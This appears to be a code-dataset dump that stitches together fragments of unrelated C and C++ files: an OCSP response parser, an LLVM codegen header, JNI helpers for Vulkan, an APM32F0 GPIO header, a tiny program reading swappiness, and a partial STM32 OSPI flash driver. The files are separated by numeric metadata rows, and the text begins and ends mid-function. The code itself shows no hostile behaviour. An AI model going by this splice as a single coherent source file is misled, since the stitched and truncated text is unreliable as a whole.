responseType = asn1_known_oid(object);
break;
case OCSP_RESPONSE:
switch (responseType)
{
case OID_BASIC:
success = parse_basicOCSPResponse(this, object,
parser->get_level(parser)+1);
break;
default:
DBG1(DBG_LIB, " ocsp response type %#B not supported",
&object);
goto end;
}
break;
}
}
success &= parser->success(parser);
end:
parser->destroy(parser);
return success;
}
METHOD(certificate_t, get_type, certificate_type_t,
private_x509_ocsp_response_t *this)
{
return CERT_X509_OCSP_RESPONSE;
}
METHOD(certificate_t, get_issuer, identification_t*,
private_x509_ocsp_response_t *this)
{
return this->responderId;
}
METHOD(certificate_t, has_issuer, id_match_t,
private_x509_ocsp_response_t *this, identification_t *issuer)
{
return this->responderId->matches(this->responderId, issuer);
}
METHOD(certificate_t, issued_by, bool,
private_x509_ocsp_response_t *this, certificate_t *issuer,
signature_scheme_t *schemep)
{
public_key_t *key;
signature_scheme_t scheme;
bool valid;
x509_t *x509 = (x509_t*)issuer;
if (issuer->get_type(issuer) != CERT_X509)
{
return FALSE;
}
if (this->responderId->get_type(this->responderId) == ID_KEY_ID)
{
chunk_t fingerprint;
key = issuer->get_public_key(issuer);
if (!key ||
!key->get_fingerprint(key, KEYID_PUBKEY_SHA1, &fingerprint) ||
!chunk_equals(fingerprint,
this->responderId->get_encoding(this->responderId)))
{
DESTROY_IF(key);
return FALSE;
}
key->destroy(key);
}
else
{
if (!this->responderId->equals(this->responderId,
issuer->get_subject(issuer)))
{
return FALSE;
}
}
if (!(x509->get_flags(x509) & X509_OCSP_SIGNER) &&
!(x509->get_flags(x509) & X509_CA))
{
return FALSE;
}
/* get the public key of the issuer */
key = issuer->get_public_key(issuer);
/* determine signature scheme */
scheme = signature_scheme_from_oid(this->signatureAlgorithm);
if (scheme == SIGN_UNKNOWN || key == NULL)
{
return FALSE;
}
valid = key->verify(key, scheme, this->tbsResponseData, this->signature);
key->destroy(key);
if (valid && schemep)
{
*schemep = scheme;
}
return valid;
}
METHOD(certificate_t, get_public_key, public_key_t*,
private_x509_ocsp_response_t *this)
{
return NULL;
}
METHOD(certificate_t, get_validity, bool,
private_x509_ocsp_response_t *this, time_t *when,
time_t *not_before, time_t *not_after)
{
time_t t = when ? *when : time(NULL);
if (not_before)
{
*not_before = this->producedAt;
}
if (not_after)
{
*not_after = this->usableUntil;
}
return (t < this->usableUntil);
}
METHOD(certificate_t, get_encoding, bool,
private_x509_ocsp_response_t *this, cred_encoding_type_t type,
chunk_t *encoding)
{
if (type == CERT_ASN1_DER)
{
*encoding = chunk_clone(this->encoding);
return TRUE;
}
return lib->encoding->encode(lib->encoding, type, NULL, encoding,
CRED_PART_X509_OCSP_RES_ASN1_DER, this->encoding, CRED_PART_END);
}
METHOD(certificate_t, equals, bool,
private_x509_ocsp_response_t *this, certificate_t *other)
{
chunk_t encoding;
bool equal;
if (this == (private_x509_ocsp_response_t*)other)
{
return TRUE;
}
if (other->get_type(other) != CERT_X509_OCSP_RESPONSE)
{
return FALSE;
}
if (other->equals == (void*)equals)
{ /* skip allocation if we have the same implementation */
return chunk_equals(this->encoding, ((private_x509_ocsp_response_t*)other)->encoding);
}
if (!other->get_encoding(other, CERT_ASN1_DER, &encoding))
{
return FALSE;
}
equal = chunk_equals(this->encoding, encoding);
free(encoding.ptr);
return equal;
}
METHOD(certificate_t, get_ref, certificate_t*,
private_x509_ocsp_response_t *this)
{
ref_get(&this->ref);
return &this->public.interface.certificate;
}
METHOD(certificate_t, destroy, void,
private_x509_ocsp_response_t *this)
{
if (ref_put(&this->ref))
{
this->certs->destroy_offset(this->certs, offsetof(certificate_t, destroy));
this->responses->destroy_function(this->responses, free);
DESTROY_IF(this->responderId);
free(this->encoding.ptr);
free(this);
}
}
/**
* load an OCSP response
*/
static x509_ocsp_response_t *load(chunk_t blob)
{
private_x509_ocsp_response_t *this;
INIT(this,
.public = {
.interface = {
.certificate = {
.get_type = _get_type,
.get_subject = _get_issuer,
.get_issuer = _get_issuer,
.has_subject = _has_issuer,
.has_issuer = _has_issuer,
.issued_by = _issued_by,
.get_public_key = _get_public_key,
.get_validity = _get_validity,
.get_encoding = _get_encoding,
.equals = _equals,
.get_ref = _get_ref,
.destroy = _destroy,
},
.get_status = _get_status,
.create_cert_enumerator = _create_cert_enumerator,
},
},
.ref = 1,
.encoding = chunk_clone(blob),
.producedAt = UNDEFINED_TIME,
.usableUntil = UNDEFINED_TIME,
.responses = linked_list_create(),
.signatureAlgorithm = OID_UNKNOWN,
.certs = linked_list_create(),
);
if (!parse_OCSPResponse(this))
{
destroy(this);
return NULL;
}
return &this->public;
}
/**
* See header.
*/
x509_ocsp_response_t *x509_ocsp_response_load(certificate_type_t type,
va_list args)
{
chunk_t blob = chunk_empty;
while (TRUE)
{
switch (va_arg(args, builder_part_t))
{
case BUILD_BLOB_ASN1_DER:
blob = va_arg(args, chunk_t);
continue;
case BUILD_END:
break;
default:
return NULL;
}
break;
}
if (blob.ptr)
{
return load(blob);
}
return NULL;
}
| 26.837626 | 88 | 0.675832 |
97a5dd156f203ab85655688a3e49f86283592caf | 5,964 | h | C | codegen/include/coolang/codegen/c_std.h | kirisky/coolang | e4da08d2b2428d3c27670db5a46d35b6d9bb1e79 | [
"Apache-2.0"
] | 25 | 2020-03-23T16:36:43.000Z | 2021-09-13T12:40:58.000Z | codegen/include/coolang/codegen/c_std.h | kirisky/coolang | e4da08d2b2428d3c27670db5a46d35b6d9bb1e79 | [
"Apache-2.0"
] | 5 | 2020-01-02T16:15:58.000Z | 2020-03-23T13:53:10.000Z | codegen/include/coolang/codegen/c_std.h | kirisky/coolang | e4da08d2b2428d3c27670db5a46d35b6d9bb1e79 | [
"Apache-2.0"
] | 1 | 2021-12-25T14:50:00.000Z | 2021-12-25T14:50:00.000Z | /*
* Copyright 2019 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef COOLANG_CODEGEN_C_STD_H
#define COOLANG_CODEGEN_C_STD_H
#include <llvm/IR/LLVMContext.h>
#include "coolang/codegen/ast_to_code_map.h"
namespace coolang {
class CStd {
public:
CStd(llvm::Module* module, AstToCodeMap* ast_to_code_map)
: module_(module), ast_to_code_map_(ast_to_code_map) {}
llvm::Constant* GetPrintfFunc() const { return printf_func_; }
llvm::Constant* GetStrlenFunc() const { return strlen_func_; }
llvm::Constant* GetStrcpyFunc() const { return strcpy_func_; }
llvm::Constant* GetStrncpyFunc() const { return strncpy_func_; }
llvm::Constant* GetStrcatFunc() const { return strcat_func_; }
llvm::Constant* GetExitFunc() const { return exit_func_; }
llvm::Constant* GetStrCmpFunc() const { return strcmp_func_; }
llvm::Constant* GetGetcharFunc() const { return getchar_func_; }
llvm::Constant* GetAtoiFunc() const { return atoi_func_; }
llvm::Constant* GetGcMallocFunc() const { return gc_malloc_func_; }
llvm::Constant* GetGcCopyObjFunc() const { return gc_copy_obj_func_; }
llvm::Constant* GetGcMallocStringFunc() const {
return gc_malloc_string_func_;
}
llvm::Constant* GetGcAddRootFunc() const { return gc_add_root_func_; }
llvm::Constant* GetGcAddStringRootFunc() const {
return gc_add_string_root_func_;
}
llvm::Constant* GetGcRemoveRootFunc() const { return gc_remove_root_func_; }
llvm::Constant* GetGcRemoveStringRootFunc() const {
return gc_remove_string_root_func_;
}
llvm::Constant* GetGcSystemInitFunc() const { return gc_system_init_func_; }
llvm::Constant* GetGcSystemDestroyFunc() const {
return gc_system_destroy_func_;
}
private:
llvm::Constant* CreateCStdFuncDecl(const std::string& func_name,
const std::string& return_type_str,
const std::vector<std::string>& arg_types,
bool is_var_arg = false) const {
std::vector<llvm::Type*> llvm_arg_types;
for (const auto& arg : arg_types) {
llvm_arg_types.push_back(ast_to_code_map_->LlvmBasicType(arg));
}
llvm::Type* return_type;
if (return_type_str == "Void") {
return_type = ast_to_code_map_->LlvmVoidType();
} else {
return_type = ast_to_code_map_->LlvmBasicType(return_type_str);
}
return CreateCStdFuncDecl(func_name, return_type, llvm_arg_types,
is_var_arg);
}
llvm::Constant* CreateCStdFuncDecl(
const std::string& func_name, llvm::Type* return_type,
const std::vector<llvm::Type*>& llvm_arg_types,
bool is_var_arg = false) const {
llvm::FunctionType* func_type =
llvm::FunctionType::get(return_type, llvm_arg_types, is_var_arg);
return module_->getOrInsertFunction(func_name, func_type);
}
llvm::Module* module_;
AstToCodeMap* ast_to_code_map_;
llvm::Constant* printf_func_ =
CreateCStdFuncDecl("printf", "Int", {"String"}, true);
llvm::Constant* strlen_func_ =
CreateCStdFuncDecl("strlen", "Int", {"String"});
llvm::Constant* strcpy_func_ =
CreateCStdFuncDecl("strcpy", "String", {"String", "String"});
llvm::Constant* strncpy_func_ =
CreateCStdFuncDecl("strncpy", "String", {"String", "String", "Int"});
llvm::Constant* strcat_func_ =
CreateCStdFuncDecl("strcat", "String", {"String", "String"});
llvm::Constant* strcmp_func_ =
CreateCStdFuncDecl("strcmp", "Int", {"String", "String"});
llvm::Constant* atoi_func_ = CreateCStdFuncDecl("atoi", "Int", {"String"});
llvm::Constant* getchar_func_ = CreateCStdFuncDecl("getchar", "Int", {});
llvm::Constant* exit_func_ = CreateCStdFuncDecl("exit", "Void", {"Int"});
llvm::Constant* gc_malloc_func_ =
CreateCStdFuncDecl("gc_malloc", "String", {"Int", "String"});
llvm::Constant* gc_copy_obj_func_ =
CreateCStdFuncDecl("gc_copy_obj", ast_to_code_map_->LlvmVoidType(),
{ast_to_code_map_->LlvmClass("Object")->getPointerTo(),
ast_to_code_map_->LlvmClass("Object")->getPointerTo(),
ast_to_code_map_->LlvmBasicType("Int")},
false);
llvm::Constant* gc_malloc_string_func_ =
CreateCStdFuncDecl("gc_malloc_string", "String", {"Int"});
llvm::Constant* gc_add_root_func_ = CreateCStdFuncDecl(
"gc_add_root", ast_to_code_map_->LlvmVoidType(),
{ast_to_code_map_->LlvmClass("Object")->getPointerTo()->getPointerTo()},
false);
llvm::Constant* gc_add_string_root_func_ = CreateCStdFuncDecl(
"gc_add_string_root", ast_to_code_map_->LlvmVoidType(),
{ast_to_code_map_->LlvmBasicType("String")->getPointerTo()}, false);
llvm::Constant* gc_remove_root_func_ = CreateCStdFuncDecl(
"gc_remove_root", ast_to_code_map_->LlvmVoidType(),
{ast_to_code_map_->LlvmClass("Object")->getPointerTo()->getPointerTo()},
false);
llvm::Constant* gc_remove_string_root_func_ = CreateCStdFuncDecl(
"gc_remove_string_root", ast_to_code_map_->LlvmVoidType(),
{ast_to_code_map_->LlvmBasicType("String")->getPointerTo()}, false);
llvm::Constant* gc_system_init_func_ =
CreateCStdFuncDecl("gc_system_init", "Void", {"Int"});
llvm::Constant* gc_system_destroy_func_ =
CreateCStdFuncDecl("gc_system_destroy", "Void", {});
};
} // namespace coolang
#endif // COOLANG_CODEGEN_C_STD_H
| 41.131034 | 80 | 0.693327 |
e3d7b9fb49b0baaa337205f35e915f5e4c1c7e35 | 1,234 | c | C | 1.1/src/c/cz/mg/vulkan/Utilities.c | Gekoncze/MgVulkan | 2d2ebc0d3df6640d1f18cff32e9782542b0a441e | [
"BSD-3-Clause"
] | null | null | null | 1.1/src/c/cz/mg/vulkan/Utilities.c | Gekoncze/MgVulkan | 2d2ebc0d3df6640d1f18cff32e9782542b0a441e | [
"BSD-3-Clause"
] | null | null | null | 1.1/src/c/cz/mg/vulkan/Utilities.c | Gekoncze/MgVulkan | 2d2ebc0d3df6640d1f18cff32e9782542b0a441e | [
"BSD-3-Clause"
] | null | null | null | #include <jni.h>
#include <stdlib.h>
#include <string.h>
#include <vulkan/vulkan.h>
jlong jniPointerToLong(const void* p);
void* jniLongToPointer(jlong l);
jlong jniFunctionPointerToLong(PFN_vkVoidFunction p);
PFN_vkVoidFunction jniLongToFunctionPointer(jlong l);
void jniThrowException(JNIEnv* env, const char* message);
#include <string.h>
#include <stdio.h>
jlong jniPointerToLong(const void* p)
{
if(sizeof(void*) > sizeof(jlong)) return 0;
jlong l;
memcpy(&l, &p, sizeof(void*));
return l;
}
void* jniLongToPointer(jlong l)
{
if(sizeof(void*) > sizeof(jlong)) return 0;
void* p;
memcpy(&p, &l, sizeof(void*));
return p;
}
jlong jniFunctionPointerToLong(PFN_vkVoidFunction p)
{
if(sizeof(PFN_vkVoidFunction) > sizeof(jlong)) return 0;
jlong l;
memcpy(&l, &p, sizeof(PFN_vkVoidFunction));
return l;
}
PFN_vkVoidFunction jniLongToFunctionPointer(jlong l)
{
if(sizeof(PFN_vkVoidFunction) > sizeof(jlong)) return 0;
PFN_vkVoidFunction p;
memcpy(&p, &l, sizeof(PFN_vkVoidFunction));
return p;
}
void jniThrowException(JNIEnv* env, const char* message)
{
jclass c = (*env)->FindClass(env, "java/lang/RuntimeException");
(*env)->ThrowNew(env, c, message);
}
| 23.730769 | 68 | 0.700162 |
8740011429e8547388f699066339de7cb533c3f4 | 5,394 | h | C | bsp/apm32f030r8/Library/APM32F0xx_StdPeriphDriver/inc/apm32f0xx_gpio.h | GorgonMeducer/pikascript | fefe9afb17d14c1a3bbe75c4c6a83d65831f451e | [
"MIT"
] | 228 | 2021-09-11T06:09:43.000Z | 2022-03-30T08:09:01.000Z | bsp/apm32f030r8/Library/APM32F0xx_StdPeriphDriver/inc/apm32f0xx_gpio.h | GorgonMeducer/pikascript | fefe9afb17d14c1a3bbe75c4c6a83d65831f451e | [
"MIT"
] | 48 | 2021-09-25T01:23:43.000Z | 2022-03-31T07:34:43.000Z | bsp/apm32f030r8/Library/APM32F0xx_StdPeriphDriver/inc/apm32f0xx_gpio.h | GorgonMeducer/pikascript | fefe9afb17d14c1a3bbe75c4c6a83d65831f451e | [
"MIT"
] | 31 | 2021-09-17T12:06:45.000Z | 2022-03-19T16:10:11.000Z | /*!
* @file apm32f0xx_gpio.h
*
* @brief This file contains all the functions prototypes for the GPIO firmware library
*
* @version V1.0.1
*
* @date 2021-07-01
*
*/
#ifndef __GPIO_H
#define __GPIO_H
#include "apm32f0xx.h"
#ifdef __cplusplus
extern "C" {
#endif
/** @addtogroup Peripherals_Library Standard Peripheral Library
@{
*/
/** @addtogroup GPIO_Driver GPIO Driver
@{
*/
/** @addtogroup GPIO_Enumerations Enumerations
@{
*/
/**
* @brief Configuration Mode enumeration
*/
typedef enum
{
GPIO_MODE_IN = 0x00, //!< GPIO Input Mode
GPIO_MODE_OUT = 0x01, //!< GPIO Output Mode
GPIO_MODE_AF = 0x02, //!< GPIO Alternate function Mode
GPIO_MODE_AN = 0X03, //!< GPIO Analog In/Out Mode
} GPIO_MODE_T;
/**
* @brief Output_type_enumeration
*/
typedef enum
{
GPIO_OUT_TYPE_PP = 0x00, //!< General purpose output push-pull
GPIO_OUT_TYPE_OD = 0x01, //!< General purpose output Open-drain
} GPIO_OUT_TYPE_T;
/**
* @brief GPIO Output Maximum frequency selection
*/
typedef enum
{
GPIO_SPEED_2MHz = 0x00, //!< Output speed up to 2 MHz
GPIO_SPEED_10MHz = 0x01, //!< Output speed up to 10 MHz
GPIO_SPEED_50MHz = 0x03, //!< Output speed up to 50 MHz
} GPIO_SPEED_T;
/**
* @brief Configuration_Pull-Up_Pull-Down_enumeration
*/
typedef enum
{
GPIO_PUPD_NO = 0x00,
GPIO_PUPD_PU = 0x01, //!< Input with pull-up
GPIO_PUPD_PD = 0x02, //!< Input with pull-down
} GPIO_PUPD_T;
/**
* @brief Bit_SET_and_Bit_RESET_enumeration
*/
typedef enum
{
Bit_RESET,
Bit_SET
} GPIO_BSRET_T;
/**
* @brief Definition of the GPIO pins
*/
typedef enum
{
GPIO_PIN_0 = ((uint16_t)BIT0),
GPIO_PIN_1 = ((uint16_t)BIT1),
GPIO_PIN_2 = ((uint16_t)BIT2),
GPIO_PIN_3 = ((uint16_t)BIT3),
GPIO_PIN_4 = ((uint16_t)BIT4),
GPIO_PIN_5 = ((uint16_t)BIT5),
GPIO_PIN_6 = ((uint16_t)BIT6),
GPIO_PIN_7 = ((uint16_t)BIT7),
GPIO_PIN_8 = ((uint16_t)BIT8),
GPIO_PIN_9 = ((uint16_t)BIT9),
GPIO_PIN_10 = ((uint16_t)BIT10),
GPIO_PIN_11 = ((uint16_t)BIT11),
GPIO_PIN_12 = ((uint16_t)BIT12),
GPIO_PIN_13 = ((uint16_t)BIT13),
GPIO_PIN_14 = ((uint16_t)BIT14),
GPIO_PIN_15 = ((uint16_t)BIT15),
GPIO_PIN_ALL = ((uint32_t)0XFFFF),
} GPIO_PIN_T;
/**
* @brief gpio pin source define
*/
typedef enum
{
GPIO_PIN_SOURCE_0 = ((uint8_t)0x00),
GPIO_PIN_SOURCE_1 = ((uint8_t)0x01),
GPIO_PIN_SOURCE_2 = ((uint8_t)0x02),
GPIO_PIN_SOURCE_3 = ((uint8_t)0x03),
GPIO_PIN_SOURCE_4 = ((uint8_t)0x04),
GPIO_PIN_SOURCE_5 = ((uint8_t)0x05),
GPIO_PIN_SOURCE_6 = ((uint8_t)0x06),
GPIO_PIN_SOURCE_7 = ((uint8_t)0x07),
GPIO_PIN_SOURCE_8 = ((uint8_t)0x08),
GPIO_PIN_SOURCE_9 = ((uint8_t)0x09),
GPIO_PIN_SOURCE_10 = ((uint8_t)0x0A),
GPIO_PIN_SOURCE_11 = ((uint8_t)0x0B),
GPIO_PIN_SOURCE_12 = ((uint8_t)0x0C),
GPIO_PIN_SOURCE_13 = ((uint8_t)0x0D),
GPIO_PIN_SOURCE_14 = ((uint8_t)0x0E),
GPIO_PIN_SOURCE_15 = ((uint8_t)0x0F),
} GPIO_PIN_SOURCE_T;
/**
* @brief gpio alternate_function define
*/
typedef enum
{
GPIO_AF_PIN0 = ((uint8_t)0x00),
GPIO_AF_PIN1 = ((uint8_t)0x01),
GPIO_AF_PIN2 = ((uint8_t)0x02),
GPIO_AF_PIN3 = ((uint8_t)0x03),
GPIO_AF_PIN4 = ((uint8_t)0x04),
GPIO_AF_PIN5 = ((uint8_t)0x05),
GPIO_AF_PIN6 = ((uint8_t)0x06),
GPIO_AF_PIN7 = ((uint8_t)0x07),
} GPIO_AF_T;
/**@} end of group GPIO_Enumerations*/
/** @addtogroup GPIO_Structure Data Structure
@{
*/
/**
* @brief GPIO Config structure definition
*/
typedef struct
{
uint16_t pin;
GPIO_MODE_T mode;
GPIO_OUT_TYPE_T outtype;
GPIO_SPEED_T speed;
GPIO_PUPD_T pupd;
} GPIO_Config_T;
/**@} end of group GPIO_Structure*/
/** @addtogroup GPIO_Fuctions Fuctions
@{
*/
/** Reset and Configuration */
void GPIO_Reset(GPIO_T* port);
void GPIO_Config(GPIO_T* port, GPIO_Config_T* gpioConfig);
void GPIO_ConfigStructInit(GPIO_Config_T* gpioConfig);
/** Lock */
void GPIO_ConfigPinLock(GPIO_T* port, uint16_t pin);
/** Read */
uint16_t GPIO_ReadOutputPort(GPIO_T* port);
uint16_t GPIO_ReadInputPort(GPIO_T* port);
uint8_t GPIO_ReadInputBit(GPIO_T* port, uint16_t pin);
uint8_t GPIO_ReadOutputBit(GPIO_T* port, uint16_t pin);
/** Write */
void GPIO_SetBit(GPIO_T* port, uint16_t pin);
void GPIO_ClearBit(GPIO_T* port, uint16_t pin);
void GPIO_WriteBitValue(GPIO_T* port, uint16_t pin, GPIO_BSRET_T bitVal);
void GPIO_WriteOutputPort(GPIO_T* port, uint16_t portValue);
/** Alternate function */
void GPIO_ConfigPinAF(GPIO_T* port, GPIO_PIN_SOURCE_T pinSource, GPIO_AF_T afPin);
/**@} end of group GPIO_Fuctions*/
/**@} end of group GPIO_Driver */
/**@} end of group Peripherals_Library*/
#ifdef __cplusplus
}
#endif
#endif /* __GPIO_H */
| 26.70297 | 93 | 0.600667 |
87593d0eb25c9adfd5a4105c14e0e4979e19b23b | 206 | c | C | c/readproc.c | kmmiles/bad-code | 83c54a944c747a0c2144880f12d99926bfdf466a | [
"MIT"
] | 1 | 2021-02-24T22:24:37.000Z | 2021-02-24T22:24:37.000Z | c/readproc.c | kmmiles/bad-code | 83c54a944c747a0c2144880f12d99926bfdf466a | [
"MIT"
] | null | null | null | c/readproc.c | kmmiles/bad-code | 83c54a944c747a0c2144880f12d99926bfdf466a | [
"MIT"
] | null | null | null | #include <stdio.h>
#define SWAPPINESS "/proc/sys/vm/swappiness"
int main(void) {
FILE *fp = NULL;
int num = 0;
fp = fopen(SWAPPINESS, "r");
fscanf(fp, "%d", &num);
printf("Hello, World\n");
}
| 14.714286 | 44 | 0.597087 |
6e7b075a8649cb5c66c7b413cb06d43e9e61bc0f | 41,294 | c | C | drivers/flash/flash_stm32_ospi.c | ldalek/zephyr | fa2054f93e4e80b079a4a6a9e84d642e51912042 | [
"Apache-2.0"
] | 1 | 2022-02-23T09:03:56.000Z | 2022-02-23T09:03:56.000Z | drivers/flash/flash_stm32_ospi.c | ldalek/zephyr | fa2054f93e4e80b079a4a6a9e84d642e51912042 | [
"Apache-2.0"
] | 3 | 2021-10-14T04:32:03.000Z | 2021-11-12T09:02:16.000Z | drivers/flash/flash_stm32_ospi.c | ldalek/zephyr | fa2054f93e4e80b079a4a6a9e84d642e51912042 | [
"Apache-2.0"
] | 1 | 2022-02-20T21:00:33.000Z | 2022-02-20T21:00:33.000Z | /*
* Copyright (c) 2022 STMicroelectronics
*
* SPDX-License-Identifier: Apache-2.0
*/
#define DT_DRV_COMPAT st_stm32_ospi_nor
#include <errno.h>
#include <zephyr/kernel.h>
#include <zephyr/toolchain.h>
#include <zephyr/arch/common/ffs.h>
#include <zephyr/sys/util.h>
#include <soc.h>
#include <zephyr/drivers/pinctrl.h>
#include <zephyr/drivers/clock_control/stm32_clock_control.h>
#include <zephyr/drivers/clock_control.h>
#include <zephyr/drivers/flash.h>
#include <zephyr/dt-bindings/flash_controller/ospi.h>
#include <zephyr/drivers/gpio.h>
#include "spi_nor.h"
#include "jesd216.h"
#include <zephyr/logging/log.h>
LOG_MODULE_REGISTER(flash_stm32_ospi, CONFIG_FLASH_LOG_LEVEL);
#define STM32_OSPI_RESET_GPIO DT_INST_NODE_HAS_PROP(0, reset_gpios)
#define STM32_OSPI_FIFO_THRESHOLD 4
#define STM32_OSPI_CLOCK_PRESCALER_MAX 255
/* Max Time value during reset or erase operation */
#define STM32_OSPI_RESET_MAX_TIME 100U
#define STM32_OSPI_BULK_ERASE_MAX_TIME 460000U
#define STM32_OSPI_SECTOR_ERASE_MAX_TIME 1000U
#define STM32_OSPI_SUBSECTOR_4K_ERASE_MAX_TIME 400U
#define STM32_OSPI_WRITE_REG_MAX_TIME 40U
typedef void (*irq_config_func_t)(const struct device *dev);
struct flash_stm32_ospi_config {
OCTOSPI_TypeDef *regs;
struct stm32_pclken pclken;
irq_config_func_t irq_config;
size_t flash_size;
uint32_t max_frequency;
int data_mode; /* SPI or QSPI or OSPI */
int data_rate; /* DTR or STR */
const struct pinctrl_dev_config *pcfg;
#if STM32_OSPI_RESET_GPIO
const struct gpio_dt_spec reset;
#endif /* STM32_OSPI_RESET_GPIO */
#if DT_NODE_HAS_PROP(DT_INST(0, st_stm32_ospi_nor), sfdp_bfp)
uint8_t sfdp_bfp[DT_INST_PROP_LEN(0, sfdp_bfp)];
#endif /* sfdp_bfp */
};
struct flash_stm32_ospi_data {
OSPI_HandleTypeDef hospi;
struct k_sem sem;
struct k_sem sync;
#if defined(CONFIG_FLASH_PAGE_LAYOUT)
struct flash_pages_layout layout;
#endif
struct jesd216_erase_type erase_types[JESD216_NUM_ERASE_TYPES];
/* Number of bytes per page */
uint16_t page_size;
int cmd_status;
};
static inline void ospi_lock_thread(const struct device *dev)
{
struct flash_stm32_ospi_data *dev_data = dev->data;
k_sem_take(&dev_data->sem, K_FOREVER);
}
static inline void ospi_unlock_thread(const struct device *dev)
{
struct flash_stm32_ospi_data *dev_data = dev->data;
k_sem_give(&dev_data->sem);
}
static int ospi_send_cmd(const struct device *dev, OSPI_RegularCmdTypeDef *cmd)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
HAL_StatusTypeDef hal_ret;
LOG_DBG("Instruction 0x%x", cmd->Instruction);
dev_data->cmd_status = 0;
hal_ret = HAL_OSPI_Command(&dev_data->hospi, cmd, HAL_OSPI_TIMEOUT_DEFAULT_VALUE);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to send OSPI instruction", hal_ret);
return -EIO;
}
LOG_DBG("CCR 0x%x", dev_cfg->regs->CCR);
return dev_data->cmd_status;
}
static int ospi_read_access(const struct device *dev, OSPI_RegularCmdTypeDef *cmd,
uint8_t *data, size_t size)
{
struct flash_stm32_ospi_data *dev_data = dev->data;
HAL_StatusTypeDef hal_ret;
cmd->NbData = size;
dev_data->cmd_status = 0;
hal_ret = HAL_OSPI_Command(&dev_data->hospi, cmd, HAL_OSPI_TIMEOUT_DEFAULT_VALUE);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to send OSPI instruction", hal_ret);
return -EIO;
}
hal_ret = HAL_OSPI_Receive_IT(&dev_data->hospi, data);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to read data", hal_ret);
return -EIO;
}
k_sem_take(&dev_data->sync, K_FOREVER);
return dev_data->cmd_status;
}
static int ospi_write_access(const struct device *dev, OSPI_RegularCmdTypeDef *cmd,
const uint8_t *data, size_t size)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
HAL_StatusTypeDef hal_ret;
LOG_DBG("Instruction 0x%x", cmd->Instruction);
cmd->NbData = size;
dev_data->cmd_status = 0;
/* in OPI/STR the 3-byte AddressSize is not supported by the NOR flash */
if ((dev_cfg->data_mode == OSPI_OPI_MODE) &&
(cmd->AddressSize != HAL_OSPI_ADDRESS_32_BITS)) {
LOG_ERR("OSPI wr in OPI/STR mode is for 32bit address only");
return -EIO;
}
hal_ret = HAL_OSPI_Command(&dev_data->hospi, cmd, HAL_OSPI_TIMEOUT_DEFAULT_VALUE);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to send OSPI instruction", hal_ret);
return -EIO;
}
hal_ret = HAL_OSPI_Transmit_IT(&dev_data->hospi, (uint8_t *)data);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to read data", hal_ret);
return -EIO;
}
k_sem_take(&dev_data->sync, K_FOREVER);
return dev_data->cmd_status;
}
/*
* Gives a OSPI_RegularCmdTypeDef with all parameters set
* except Instruction, Address, DummyCycles, NbData
*/
static OSPI_RegularCmdTypeDef ospi_prepare_cmd(uint8_t transfer_mode, uint8_t transfer_rate)
{
OSPI_RegularCmdTypeDef cmd_tmp = {
.OperationType = HAL_OSPI_OPTYPE_COMMON_CFG,
.FlashId = HAL_OSPI_FLASH_ID_1,
.InstructionMode = ((transfer_mode == OSPI_SPI_MODE)
? HAL_OSPI_INSTRUCTION_1_LINE
: HAL_OSPI_INSTRUCTION_8_LINES),
.InstructionSize = ((transfer_mode == OSPI_SPI_MODE)
? HAL_OSPI_INSTRUCTION_8_BITS
: HAL_OSPI_INSTRUCTION_16_BITS),
.InstructionDtrMode = ((transfer_rate == OSPI_DTR_TRANSFER)
? HAL_OSPI_INSTRUCTION_DTR_ENABLE
: HAL_OSPI_INSTRUCTION_DTR_DISABLE),
.AddressMode = ((transfer_mode == OSPI_SPI_MODE)
? HAL_OSPI_ADDRESS_1_LINE
: HAL_OSPI_ADDRESS_8_LINES),
.AddressDtrMode = ((transfer_rate == OSPI_DTR_TRANSFER)
? HAL_OSPI_ADDRESS_DTR_ENABLE
: HAL_OSPI_ADDRESS_DTR_DISABLE),
.AddressSize = HAL_OSPI_ADDRESS_32_BITS,
.AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_NONE,
.DataMode = ((transfer_mode == OSPI_SPI_MODE)
? HAL_OSPI_DATA_1_LINE
: HAL_OSPI_DATA_8_LINES),
.DataDtrMode = ((transfer_rate == OSPI_DTR_TRANSFER)
? HAL_OSPI_DATA_DTR_ENABLE
: HAL_OSPI_DATA_DTR_DISABLE),
.DQSMode = (transfer_rate == OSPI_DTR_TRANSFER)
? HAL_OSPI_DQS_ENABLE
: HAL_OSPI_DQS_DISABLE,
.SIOOMode = HAL_OSPI_SIOO_INST_EVERY_CMD,
};
return cmd_tmp;
}
/*
* Read Serial Flash Discovery Parameter :
* perform a read access over SPI bus for SDFP (DataMode is already set)
* or get it from the sdfp table (in the DTS)
*/
static int ospi_read_sfdp(const struct device *dev, off_t addr, uint8_t *data,
size_t size)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
#if DT_NODE_HAS_PROP(DT_INST(0, st_stm32_ospi_nor), sfdp_bfp)
/* simulate the SDFP */
ARG_UNUSED(addr); /* addr is 0 */
for (uint8_t i_ind = 0; i_ind < ARRAY_SIZE(dev_cfg->sfdp_bfp); i_ind++) {
*(data + i_ind) = dev_cfg->sfdp_bfp[i_ind];
}
#else /* sfdp_bfp */
OSPI_RegularCmdTypeDef cmd = ospi_prepare_cmd(dev_cfg->data_mode,
dev_cfg->data_rate);
cmd.Instruction = ((dev_cfg->data_mode == OSPI_SPI_MODE)
? JESD216_CMD_READ_SFDP
: JESD216_OCMD_READ_SFDP);
cmd.Address = addr;
cmd.AddressSize = ((dev_cfg->data_mode == OSPI_SPI_MODE)
? HAL_OSPI_ADDRESS_24_BITS
: HAL_OSPI_ADDRESS_32_BITS);
